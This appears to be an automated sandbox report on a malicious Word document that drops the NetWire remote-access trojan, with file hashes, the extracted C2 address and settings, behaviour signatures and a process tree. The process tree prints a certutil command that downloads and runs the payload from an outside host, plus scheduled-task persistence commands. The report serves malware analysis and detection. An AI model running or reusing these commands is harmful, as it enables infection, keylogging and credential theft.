Overview

overview

10

Static

static

8

RFQ 80479040.doc

windows7-x64

10

RFQ 80479040.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    98s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-09-2022 09:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RFQ 80479040.doc

  • Size

    62KB

  • MD5

    6328c4a16d653cb10c3b042301b2d6c3

  • SHA1

    4dba059a50044581f2741868ce850618a042f0b5

  • SHA256

    9e7f45fc3fe9b1849e1308f416aa57cf62588ca43359630649943b40fcf07856

  • SHA512

    6d46cc27a4786b0072f1a53cdbd6e3c42e646b6f441ef39eee0630e37863c90bf8c8e40ee026af7cd98ac14474ff96b787ccab941f995fd7db80d0dcc4c2725f

  • SSDEEP

    384:OkUgY5j96eYPKNiaI1WAE7OCb8iSUR/8dEv8krqrf4INzte/DZeIESy3uGjGWi2S:OP5I5I/q/qsfZ3qHGjG/owKSqXI

Score
10/10
netwirebotnetratstealer

Malware Config

Extracted

Family

netwire

C2

37.0.14.206:3384

Attributes
  • activex_autorun

    false

  • copy_executable

    true

  • delete_original

    false

  • host_id

    HostId-%Rand%

  • install_path

    %AppData%\Install\Host.exe

  • keylogger_dir

    %AppData%\Logs\

  • lock_executable

    true

  • offline_keylogger

    true

  • password

    Password234

  • registry_autorun

    false

  • use_mutex

    false

Signatures

  • NetWire RAT payload 6 IoCs
    rat
  • Netwire

    Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.

    botnetstealernetwire
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file
  • Executes dropped EXE 5 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ 80479040.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2464
    • C:\Windows\System32\certutil.exe
      "C:\Windows\System32\certutil.exe" -urlcache -split -f https://teqturn.com/goblin/ea05f1fD14F2Jju.exe C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe
      2⤵
      • Process spawned unexpected child process
      PID:4340
    • C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe
      "C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4976
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NksNHqr" /XML "C:\Users\Admin\AppData\Local\Temp\tmp3A98.tmp"
        3⤵
        • Creates scheduled task(s)
        PID:4672
      • C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe
        "{path}"
        3⤵
        • Executes dropped EXE
        PID:3792
      • C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe
        "{path}"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3104
        • C:\Users\Admin\AppData\Roaming\Install\Host.exe
          "C:\Users\Admin\AppData\Roaming\Install\Host.exe"
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4104
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NksNHqr" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA604.tmp"
            5⤵
            • Creates scheduled task(s)
            PID:2556
          • C:\Users\Admin\AppData\Roaming\Install\Host.exe
            "{path}"
            5⤵
            • Executes dropped EXE
            PID:4004
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k netsvcs -p
    1⤵
    • Drops file in System32 directory
    • Checks processor information in registry
    • Enumerates system info in registry
    PID:2408

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Credential Access

Discovery

Query Registry

3
T1012

System Information Discovery

4
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe
    Filesize

    882KB

    MD5

    95b5d76bfb2204011333248cc121b5a4

    SHA1

    6faea7983c34f12cec7d22184be0eb1693e0abaf

    SHA256

    849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e

    SHA512

    966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe
    Filesize

    882KB

    MD5

    95b5d76bfb2204011333248cc121b5a4

    SHA1

    6faea7983c34f12cec7d22184be0eb1693e0abaf

    SHA256

    849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e

    SHA512

    966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe
    Filesize

    882KB

    MD5

    95b5d76bfb2204011333248cc121b5a4

    SHA1

    6faea7983c34f12cec7d22184be0eb1693e0abaf

    SHA256

    849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e

    SHA512

    966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe
    Filesize

    882KB

    MD5

    95b5d76bfb2204011333248cc121b5a4

    SHA1

    6faea7983c34f12cec7d22184be0eb1693e0abaf

    SHA256

    849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e

    SHA512

    966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\tmp3A98.tmp
    Filesize

    1KB

    MD5

    e3110e1fc5bfa53e5636b145c05a9dd2

    SHA1

    ccaaa930eae7676f078baaafef310a0e60e2b196

    SHA256

    7bd775873865bef88fe486aba38d1e26483aa5d9475b8f51149458eda843ba3a

    SHA512

    aa095af6006f03afd5003013b7e9be9e338811ee0ca1647d37d9ef203e826c7e67486f81861f70653eb6125d2f49be6878d7d705eeff8936d2fd2ca00450a314

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\tmpA604.tmp
    Filesize

    1KB

    MD5

    e3110e1fc5bfa53e5636b145c05a9dd2

    SHA1

    ccaaa930eae7676f078baaafef310a0e60e2b196

    SHA256

    7bd775873865bef88fe486aba38d1e26483aa5d9475b8f51149458eda843ba3a

    SHA512

    aa095af6006f03afd5003013b7e9be9e338811ee0ca1647d37d9ef203e826c7e67486f81861f70653eb6125d2f49be6878d7d705eeff8936d2fd2ca00450a314

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Install\Host.exe
    Filesize

    882KB

    MD5

    95b5d76bfb2204011333248cc121b5a4

    SHA1

    6faea7983c34f12cec7d22184be0eb1693e0abaf

    SHA256

    849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e

    SHA512

    966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Install\Host.exe
    Filesize

    882KB

    MD5

    95b5d76bfb2204011333248cc121b5a4

    SHA1

    6faea7983c34f12cec7d22184be0eb1693e0abaf

    SHA256

    849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e

    SHA512

    966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Install\Host.exe
    Filesize

    882KB

    MD5

    95b5d76bfb2204011333248cc121b5a4

    SHA1

    6faea7983c34f12cec7d22184be0eb1693e0abaf

    SHA256

    849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e

    SHA512

    966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152

    Download Submit
  • memory/2464-171-0x00007FFC25C10000-0x00007FFC25C20000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2464-135-0x00007FFC25C10000-0x00007FFC25C20000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2464-172-0x00007FFC25C10000-0x00007FFC25C20000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2464-174-0x00007FFC25C10000-0x00007FFC25C20000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2464-138-0x00007FFC232B0000-0x00007FFC232C0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2464-137-0x00007FFC232B0000-0x00007FFC232C0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2464-133-0x00007FFC25C10000-0x00007FFC25C20000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2464-134-0x00007FFC25C10000-0x00007FFC25C20000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2464-136-0x00007FFC25C10000-0x00007FFC25C20000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2464-132-0x00007FFC25C10000-0x00007FFC25C20000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2464-173-0x00007FFC25C10000-0x00007FFC25C20000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2556-161-0x0000000000000000-mapping.dmp
    Download
  • memory/3104-153-0x0000000000400000-0x0000000000433000-memory.dmp
    Filesize

    204KB

    Download
  • memory/3104-152-0x0000000000000000-mapping.dmp
    Download
  • memory/3104-159-0x0000000000400000-0x0000000000433000-memory.dmp
    Filesize

    204KB

    Download
  • memory/3104-156-0x0000000000400000-0x0000000000433000-memory.dmp
    Filesize

    204KB

    Download
  • memory/3792-150-0x0000000000000000-mapping.dmp
    Download
  • memory/4004-168-0x0000000000400000-0x0000000000433000-memory.dmp
    Filesize

    204KB

    Download
  • memory/4004-169-0x0000000000400000-0x0000000000433000-memory.dmp
    Filesize

    204KB

    Download
  • memory/4004-163-0x0000000000000000-mapping.dmp
    Download
  • memory/4004-167-0x0000000000400000-0x0000000000433000-memory.dmp
    Filesize

    204KB

    Download
  • memory/4104-157-0x0000000000000000-mapping.dmp
    Download
  • memory/4340-139-0x0000000000000000-mapping.dmp
    Download
  • memory/4672-148-0x0000000000000000-mapping.dmp
    Download
  • memory/4976-146-0x0000000005800000-0x000000000589C000-memory.dmp
    Filesize

    624KB

    Download
  • memory/4976-145-0x0000000005760000-0x00000000057F2000-memory.dmp
    Filesize

    584KB

    Download
  • memory/4976-144-0x0000000005C70000-0x0000000006214000-memory.dmp
    Filesize

    5.6MB

    Download
  • memory/4976-143-0x0000000000C60000-0x0000000000D42000-memory.dmp
    Filesize

    904KB

    Download
  • memory/4976-141-0x0000000000000000-mapping.dmp
    Download
  • memory/4976-147-0x0000000005730000-0x000000000573A000-memory.dmp
    Filesize

    40KB

    Download